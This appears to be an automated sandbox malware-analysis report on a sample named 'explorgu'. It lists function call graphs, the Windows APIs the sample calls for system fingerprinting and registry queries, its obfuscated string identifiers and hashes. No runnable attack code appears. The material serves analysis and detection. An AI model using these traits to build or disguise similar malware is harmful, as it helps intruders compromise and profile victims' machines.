2a21a0 4 API calls 10683->10684 10686 2a5822 shared_ptr 10683->10686 10685 2a5727 shared_ptr 10684->10685 10685->10686 10687 2a21a0 4 API calls 10685->10687 10686->10658 10687->10685 10688->10680 10690 2a6bd6 shared_ptr __cftof 10689->10690 10691 2a6d13 GetNativeSystemInfo 10690->10691 10692 2a6d17 10690->10692 10703 2a6d28 shared_ptr 10690->10703 10691->10692 10693 2a6d7f 10692->10693 10694 2a6e54 10692->10694 10692->10703 10696 2a52e0 3 API calls 10693->10696 10695 2a52e0 3 API calls 10694->10695 10699 2a6eb7 10695->10699 10697 2a6ddb 10696->10697 10829 2d83bb 10697->10829 10700 2a52e0 3 API calls 10699->10700 10701 2a6f5a 10700->10701 10702 2a52e0 3 API calls 10701->10702 10702->10703 10703->10661 10706 2a7175 shared_ptr __cftof 10704->10706 10705 2a7193 10705->10667 10706->10705 10707 2a72b4 GetNativeSystemInfo 10706->10707 10707->10705 10852 2d3a50 10708->10852 10711 2a5391 RegCloseKey 10713 2a53b7 shared_ptr 10711->10713 10712 2a5367 RegQueryValueExA 10712->10711 10713->10678 10715 2d8391 10714->10715 10716 2d80d4 4 API calls 10715->10716 10717 2d839b 10716->10717 10717->10668 10719 2b2af2 10718->10719 10720 2a7310 5 API calls 10719->10720 10728 2b2b0d shared_ptr 10720->10728 10721 2b2e9e shared_ptr 10721->10674 10722 2b3674 shared_ptr 10722->10674 10723 2a55b0 5 API calls 10724 2b3722 shared_ptr 10723->10724 10725 2a6b70 8 API calls 10724->10725 10726 2b51c6 10724->10726 10727 2b377f 10725->10727 10729 2a7110 GetNativeSystemInfo 10727->10729 10728->10721 10730 2a7310 5 API calls 10728->10730 10740 2b358b shared_ptr std::_Xinvalid_argument 10728->10740 10733 2b3798 10729->10733 10731 2b2fb4 10730->10731 10732 2a7310 5 API calls 10731->10732 10734 2b3223 10731->10734 10739 2b2ffb shared_ptr __dosmaperr 10732->10739 10735 2a52e0 3 API calls 10733->10735 10736 2a7310 5 API calls 10734->10736 10734->10740 10744 2b3815 shared_ptr 10735->10744 10737 2b32c8 10736->10737 10738 2a7310 5 API calls 10737->10738 10737->10740 10742 2b330f shared_ptr 10738->10742 10739->10734 10739->10740 10741 2d8376 4 API calls 10739->10741 10740->10722 10740->10723 10741->10734 10742->10740 10743 2b2ab0 11 API calls 10742->10743 10743->10740 10744->10674 10748 2a2160 10745->10748 10749 2a2176 10748->10749 10752 2d8064 10749->10752 10755 2d6e53 10752->10755 10754 2a2184 10754->10683 10756 2d6e93 10755->10756 10760 2d6e7b __cftof __dosmaperr 10755->10760 10757 2d6237 __cftof 4 API calls 10756->10757 10756->10760 10758 2d6eab 10757->10758 10761 2d740e 10758->10761 10760->10754 10763 2d741f 10761->10763 10762 2d742e __cftof __dosmaperr 10762->10760 10763->10762 10768 2d79b2 10763->10768 10773 2d760c 10763->10773 10778 2d7632 10763->10778 10788 2d7780 10763->10788 10769 2d79bb 10768->10769 10770 2d79c2 10768->10770 10797 2d739a 10769->10797 10770->10763 10772 2d79c1 10772->10763 10774 2d761c 10773->10774 10775 2d7615 10773->10775 10774->10763 10776 2d739a 4 API calls 10775->10776 10777 2d761b 10776->10777 10777->10763 10779 2d7653 __cftof __dosmaperr 10778->10779 10781 2d7639 10778->10781 10779->10763 10780 2d77b3 10784 2d77d5 10780->10784 10786 2d77c1 10780->10786 10805 2d7a8b 10780->10805 10781->10779 10781->10780 10783 2d77ec 10781->10783 10781->10786 10783->10784 10801 2d7bda 10783->10801 10784->10763 10786->10784 10809 2d7f34 10786->10809 10789 2d77b3 10788->10789 10790 2d7799 10788->10790 10792 2d77d5 10789->10792 10793 2d7a8b 4 API calls 10789->10793 10795 2d77c1 10789->10795 10790->10789 10791 2d77ec 10790->10791 10790->10795 10791->10792 10794 2d7bda 4 API calls 10791->10794 10792->10763 10793->10795 10794->10795 10795->10792 10796 2d7f34 4 API calls 10795->10796 10796->10792 10798 2d73ac __dosmaperr 10797->10798 10799 2d8376 4 API calls 10798->10799 10800 2d73cf __dosmaperr 10799->10800 10800->10772 10802 2d7bf5 10801->10802 10803 2d7c27 10802->10803 10813 2dbf60 10802->10813 10803->10786 10806 2d7aa4 10805->10806 10816 2dca9a 10806->10816 10808 2d7b57 10808->10786 10808->10808 10811 2d7fa7 10809->10811 10812 2d7f51 10809->10812 10810 2dbf60 __cftof 4 API calls 10810->10812 10811->10784 10812->10810 10812->10811 10814 2dbe05 __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10813->10814 10815 2dbf78 10814->10815 10815->10803 10818 2dcac0 10816->10818 10826 2dcaaa __cftof __dosmaperr 10816->10826 10817 2dcb57 10821 2dcbb6 10817->10821 10822 2dcb80 10817->10822 10818->10817 10819 2dcb5c 10818->10819 10818->10826 10820 2dc2b1 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10819->10820 10820->10826 10825 2dc5ca GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10821->10825 10823 2dcb9e 10822->10823 10824 2dcb85 10822->10824 10828 2dc7b4 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10823->10828 10827 2dc910 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 10824->10827 10825->10826 10826->10808 10827->10826 10828->10826 10832 2d80d4 10829->10832 10831 2d83d9 10831->10703 10833 2d80e6 10832->10833 10834 2d6237 __cftof 4 API calls 10833->10834 10837 2d80fb __cftof __dosmaperr 10833->10837 10836 2d812b 10834->10836 10836->10837 10838 2d8322 10836->10838 10837->10831 10839 2d835f 10838->10839 10840 2d832f 10838->10840 10842 2dcbea 4 API calls 10839->10842 10841 2d833e __fassign 10840->10841 10844 2dcc0e 10840->10844 10841->10836 10842->10841 10845 2d6237 __cftof 4 API calls 10844->10845 10846 2dcc2b 10845->10846 10848 2dcc3b 10846->10848 10849 2de980 10846->10849 10848->10841 10850 2d6237 __cftof 4 API calls 10849->10850 10851 2de9a0 __cftof __fassign __freea 10850->10851 10851->10848 10853 2a5334 RegOpenKeyExA 10852->10853 10853->10711 10853->10712

                                                                                              Executed Functions

                                                                                              Function 002A55B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1883 2a55b0-2a5609 1957 2a560a call 4e90b79 1883->1957 1958 2a560a call 4e90bab 1883->1958 1959 2a560a call 4e90b5b 1883->1959 1960 2a560a call 4e90bf3 1883->1960 1961 2a560a call 4e90bd2 1883->1961 1962 2a560a call 4e90b55 1883->1962 1884 2a560f-2a5688 LookupAccountNameA call 2b7360 call 2a5190 1890 2a568a 1884->1890 1891 2a568c-2a56ab call 2a21a0 1884->1891 1890->1891 1894 2a56dc-2a56e2 1891->1894 1895 2a56ad-2a56bc 1891->1895 1898 2a56e5-2a56ea 1894->1898 1896 2a56be-2a56cc 1895->1896 1897 2a56d2-2a56d9 call 2bcfc8 1895->1897 1896->1897 1899 2a5907 call 2d6597 1896->1899 1897->1894 1898->1898 1901 2a56ec-2a5714 call 2b7360 call 2a5190 1898->1901 1906 2a590c call 2d6597 1899->1906 1911 2a5718-2a5739 call 2a21a0 1901->1911 1912 2a5716 1901->1912 1910 2a5911-2a5916 call 2d6597 1906->1910 1917 2a576a-2a577e 1911->1917 1918 2a573b-2a574a 1911->1918 1912->1911 1924 2a5828-2a584c 1917->1924 1925 2a5784-2a578a 1917->1925 1919 2a574c-2a575a 1918->1919 1920 2a5760-2a5767 call 2bcfc8 1918->1920 1919->1906 1919->1920 1920->1917 1927 2a5850-2a5855 1924->1927 1926 2a5790-2a57bd call 2b7360 call 2a5190 1925->1926 1943 2a57bf 1926->1943 1944 2a57c1-2a57e8 call 2a21a0 1926->1944 1927->1927 1928 2a5857-2a58bc call 2b7a20 * 2 1927->1928 1937 2a58e9-2a5906 call 2bc951 1928->1937 1938 2a58be-2a58cd 1928->1938 1940 2a58df-2a58e6 call 2bcfc8 1938->1940 1941 2a58cf-2a58dd 1938->1941 1940->1937 1941->1910 1941->1940 1943->1944 1950 2a57ea-2a57f9 1944->1950 1951 2a5819-2a581c 1944->1951 1952 2a57fb-2a5809 1950->1952 1953 2a580f-2a5816 call 2bcfc8 1950->1953 1951->1926 1954 2a5822 1951->1954 1952->1899 1952->1953 1953->1951 1954->1924 1957->1884 1958->1884 1959->1884 1960->1884 1961->1884 1962->1884
                                                                                              APIs
                                                                                              • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000), ref: 002A5650
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AccountLookupName
                                                                                              • String ID: CNRp3O==$ENLp3O==$NtQi1FVw
                                                                                              • API String ID: 1484870144-2849928496
                                                                                              • Opcode ID: 599146be4fdd0b03e39b86ab801f4a646f254d58c89af418e4208f962bf26bba
                                                                                              • Instruction ID: ef2b13924e5ea74570c33802ccd3067417bf685438821b260089622579828dca
                                                                                              • Opcode Fuzzy Hash: 599146be4fdd0b03e39b86ab801f4a646f254d58c89af418e4208f962bf26bba
                                                                                              • Instruction Fuzzy Hash: ED91A2B19101289BDB29DF24CC85BEEB779EF45300F5045E9E50997282DB349ED48FA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002B2AB0 Relevance: 44.5, APIs: 1, Strings: 23, Instructions: 2546COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 002B36AE
                                                                                                • Part of subcall function 002B7360: Concurrency::cancel_current_task.LIBCPMT ref: 002B7419
                                                                                                • Part of subcall function 002B7360: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002B744C
                                                                                                • Part of subcall function 002B7360: __Mtx_destroy_in_situ.LIBCPMT ref: 002B7461
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cnd_unregister_at_thread_exitConcurrency::cancel_current_taskMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                              • String ID: 246122658369$4RG3$5CO3$5X33$5YC3$6BC3$6XG3$6YG62u==$6eQ=$7RU3$7iC3$Br==$GxUuCu==$IBC+$IBG+$RSO3$RSy3$Rha3$SBQ3$T$b68ccf$invalid stoi argument$stoi argument out of range
                                                                                              • API String ID: 1107649663-1726724114
                                                                                              • Opcode ID: 383b85ae0a84167ad5e0f91f03564465b5c82516931d999a0e6ad62369f63fbd
                                                                                              • Instruction ID: 37a97448d06ca7f2d820b3b9e2723912f7fbb4e9239823a79bf23eae0ace8021
                                                                                              • Opcode Fuzzy Hash: 383b85ae0a84167ad5e0f91f03564465b5c82516931d999a0e6ad62369f63fbd
                                                                                              • Instruction Fuzzy Hash: 9D234771A201589BEF19DB28CD897DDBB76AF81344F5081D8E408AB2C2DB359FA4CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002A6B70 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1745 2a6b70-2a6bf2 call 2d3a50 1749 2a70da-2a70f7 call 2bc951 1745->1749 1750 2a6bf8-2a6c20 call 2b7360 call 2a5190 1745->1750 1757 2a6c22 1750->1757 1758 2a6c24-2a6c46 call 2b7360 call 2a5190 1750->1758 1757->1758 1763 2a6c4a-2a6c63 1758->1763 1764 2a6c48 1758->1764 1767 2a6c94-2a6cbf 1763->1767 1768 2a6c65-2a6c74 1763->1768 1764->1763 1771 2a6cf0-2a6d11 1767->1771 1772 2a6cc1-2a6cd0 1767->1772 1769 2a6c8a-2a6c91 call 2bcfc8 1768->1769 1770 2a6c76-2a6c84 1768->1770 1769->1767 1770->1769 1777 2a70f8 call 2d6597 1770->1777 1775 2a6d13-2a6d15 GetNativeSystemInfo 1771->1775 1776 2a6d17-2a6d1c 1771->1776 1773 2a6cd2-2a6ce0 1772->1773 1774 2a6ce6-2a6ced call 2bcfc8 1772->1774 1773->1774 1773->1777 1774->1771 1780 2a6d1d-2a6d26 1775->1780 1776->1780 1787 2a70fd-2a7102 call 2d6597 1777->1787 1785 2a6d28-2a6d2f 1780->1785 1786 2a6d44-2a6d47 1780->1786 1788 2a70d5 1785->1788 1789 2a6d35-2a6d3f 1785->1789 1790 2a707b-2a707e 1786->1790 1791 2a6d4d-2a6d56 1786->1791 1788->1749 1794 2a70d0 1789->1794 1790->1788 1797 2a7080-2a7089 1790->1797 1795 2a6d58-2a6d64 1791->1795 1796 2a6d69-2a6d6c 1791->1796 1794->1788 1795->1794 1798 2a7058-2a705a 1796->1798 1799 2a6d72-2a6d79 1796->1799 1800 2a708b-2a708f 1797->1800 1801 2a70b0-2a70b3 1797->1801 1808 2a7068-2a706b 1798->1808 1809 2a705c-2a7066 1798->1809 1802 2a6d7f-2a6dd6 call 2b7360 call 2a5190 call 2b7360 call 2a5190 call 2a52e0 1799->1802 1803 2a6e54-2a7041 call 2b7360 call 2a5190 call 2b7360 call 2a5190 call 2a52e0 call 2b7360 call 2a5190 call 2a4cb0 call 2b7360 call 2a5190 call 2b7360 call 2a5190 call 2a52e0 call 2b7360 call 2a5190 call 2a4cb0 call 2b7360 call 2a5190 call 2b7360 call 2a5190 call 2a52e0 call 2b7360 call 2a5190 call 2a4cb0 1799->1803 1804 2a7091-2a7096 1800->1804 1805 2a70a4-2a70ae 1800->1805 1806 2a70c1-2a70cd 1801->1806 1807 2a70b5-2a70bf 1801->1807 1831 2a6ddb-2a6de2 1802->1831 1844 2a7047-2a7050 1803->1844 1804->1805 1811 2a7098-2a70a2 1804->1811 1805->1788 1806->1794 1807->1788 1808->1788 1813 2a706d-2a7079 1808->1813 1809->1794 1811->1788 1813->1794 1833 2a6de6-2a6e06 call 2d83bb 1831->1833 1834 2a6de4 1831->1834 1839 2a6e08-2a6e17 1833->1839 1840 2a6e3d-2a6e3f 1833->1840 1834->1833 1842 2a6e19-2a6e27 1839->1842 1843 2a6e2d-2a6e3a call 2bcfc8 1839->1843 1840->1844 1845 2a6e45-2a6e4f 1840->1845 1842->1787 1842->1843 1843->1840 1844->1790 1849 2a7052 1844->1849 1845->1844 1849->1798
                                                                                              APIs
                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002A6D13
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoNativeSystem
                                                                                              • String ID: FequCe==$FequDO==$FeqvBe==
                                                                                              • API String ID: 1721193555-2223131753
                                                                                              • Opcode ID: e69c0ff949e2719627cf1babba0d3d631c7b888e850ea4a6e666b204814eddcd
                                                                                              • Instruction ID: 4d696e1a8b4242be5ceed235b16789f158ee308cd49ae2b204e08a8e99751d62
                                                                                              • Opcode Fuzzy Hash: e69c0ff949e2719627cf1babba0d3d631c7b888e850ea4a6e666b204814eddcd
                                                                                              • Instruction Fuzzy Hash: 7CD12970E242149BDB15BB68CC1B7EE7B75AB43310F544289E819A73C2DF754EA08BC2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002A52E0 Relevance: 4.7, APIs: 3, Instructions: 245registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1963 2a52e0-2a5365 call 2d3a50 RegOpenKeyExA 1966 2a5391-2a53b4 RegCloseKey 1963->1966 1967 2a5367-2a5390 RegQueryValueExA 1963->1967 1968 2a53b7-2a53bc 1966->1968 1967->1966 1968->1968 1969 2a53be-2a53d5 call 2b7a20 1968->1969 1972 2a53ff-2a5417 1969->1972 1973 2a53d7-2a53e3 1969->1973 1976 2a5419-2a5425 1972->1976 1977 2a5441-2a545c call 2bc951 1972->1977 1974 2a53f5-2a53fc call 2bcfc8 1973->1974 1975 2a53e5-2a53f3 1973->1975 1974->1972 1975->1974 1978 2a545d-2a54ab call 2d6597 1975->1978 1980 2a5437-2a543e call 2bcfc8 1976->1980 1981 2a5427-2a5435 1976->1981 1990 2a54ad-2a54d6 1978->1990 1991 2a54d7-2a54e6 1978->1991 1980->1977 1981->1978 1981->1980 1990->1991 1994 2a54e8-2a54f4 1991->1994 1995 2a5514-2a552c 1991->1995 1998 2a550a-2a5511 call 2bcfc8 1994->1998 1999 2a54f6-2a5504 1994->1999 1996 2a552e-2a553a 1995->1996 1997 2a5556-2a556e 1995->1997 2000 2a554c-2a5553 call 2bcfc8 1996->2000 2001 2a553c-2a554a 1996->2001 2002 2a5598-2a55a5 call 2bc951 1997->2002 2003 2a5570-2a557c 1997->2003 1998->1995 1999->1998 2004 2a55a6-2a55ab call 2d6597 1999->2004 2000->1997 2001->2000 2001->2004 2009 2a558e-2a5595 call 2bcfc8 2003->2009 2010 2a557e-2a558c 2003->2010 2009->2002 2010->2004 2010->2009
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 002A535D
                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 002A538B
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 002A5397
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 68b3914df2a8319a0beee923448a908b2c46f5e1b3af4460038d190e8990241f
                                                                                              • Instruction ID: e2bb6ef28b56eeb4e50c83f36b57bab72e3aa7e91802ecff2fc9b8c8ed1888ff
                                                                                              • Opcode Fuzzy Hash: 68b3914df2a8319a0beee923448a908b2c46f5e1b3af4460038d190e8990241f
                                                                                              • Instruction Fuzzy Hash: 3D81E271620108AFEF18DF28CC85BEE7B6AEF46344F508159F905972C1DB75EAD48B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002DCDF5 Relevance: 1.7, APIs: 1, Instructions: 198COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2017 2dcdf5-2dce16 call 2bd8f0 2020 2dce18 2017->2020 2021 2dce30-2dce33 2017->2021 2022 2dce4f-2dce5b call 2da81a 2020->2022 2023 2dce1a-2dce20 2020->2023 2021->2022 2024 2dce35-2dce38 2021->2024 2034 2dce5d-2dce60 2022->2034 2035 2dce65-2dce71 call 2dcd7f 2022->2035 2025 2dce44-2dce4d call 2dcd3d 2023->2025 2026 2dce22-2dce26 2023->2026 2024->2025 2027 2dce3a-2dce3d 2024->2027 2042 2dce8d-2dce96 2025->2042 2026->2022 2029 2dce28-2dce2c 2026->2029 2030 2dce3f-2dce42 2027->2030 2031 2dce73-2dce83 call 2d6e40 call 2d6587 2027->2031 2029->2031 2036 2dce2e 2029->2036 2030->2025 2030->2031 2031->2034 2039 2dcfcc-2dcfdb 2034->2039 2035->2031 2047 2dce85-2dce8a 2035->2047 2036->2025 2045 2dce98-2dcea0 call 2d85c5 2042->2045 2046 2dcea3-2dceb4 2042->2046 2045->2046 2050 2dceca 2046->2050 2051 2dceb6-2dcec8 2046->2051 2047->2042 2052 2dcecc-2dcedd 2050->2052 2051->2052 2054 2dcedf-2dcee1 2052->2054 2055 2dcf4b-2dcf5b call 2dcf88 2052->2055 2057 2dcfdc-2dcfde 2054->2057 2058 2dcee7-2dcee9 2054->2058 2064 2dcf5d-2dcf5f 2055->2064 2065 2dcfca 2055->2065 2062 2dcfe8-2dcffb call 2d5f4d 2057->2062 2063 2dcfe0-2dcfe7 call 2d860d 2057->2063 2060 2dceeb-2dceee 2058->2060 2061 2dcef5-2dcf01 2058->2061 2060->2061 2066 2dcef0-2dcef3 2060->2066 2067 2dcf41-2dcf49 2061->2067 2068 2dcf03-2dcf18 call 2dcdec * 2 2061->2068 2081 2dcffd-2dd007 2062->2081 2082 2dd009-2dd00f 2062->2082 2063->2062 2071 2dcf9a-2dcfa3 2064->2071 2072 2dcf61-2dcf77 call 2da6c3 2064->2072 2065->2039 2066->2061 2073 2dcf1b-2dcf1d 2066->2073 2067->2055 2068->2073 2092 2dcfa6-2dcfa9 2071->2092 2072->2092 2073->2067 2080 2dcf1f-2dcf2f 2073->2080 2086 2dcf31-2dcf36 2080->2086 2081->2082 2087 2dd03d-2dd048 call 2d6e40 2081->2087 2088 2dd028-2dd039 RtlAllocateHeap 2082->2088 2089 2dd011-2dd012 2082->2089 2086->2055 2091 2dcf38-2dcf3f 2086->2091 2100 2dd04a-2dd04c 2087->2100 2094 2dd03b 2088->2094 2095 2dd014-2dd01b call 2d95bb 2088->2095 2089->2088 2091->2086 2097 2dcfab-2dcfae 2092->2097 2098 2dcfb5-2dcfbd 2092->2098 2094->2100 2095->2087 2107 2dd01d-2dd026 call 2d8633 2095->2107 2097->2098 2102 2dcfb0-2dcfb3 2097->2102 2098->2065 2103 2dcfbf-2dcfc7 call 2da6c3 2098->2103 2102->2065 2102->2098 2103->2065 2107->2087 2107->2088
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
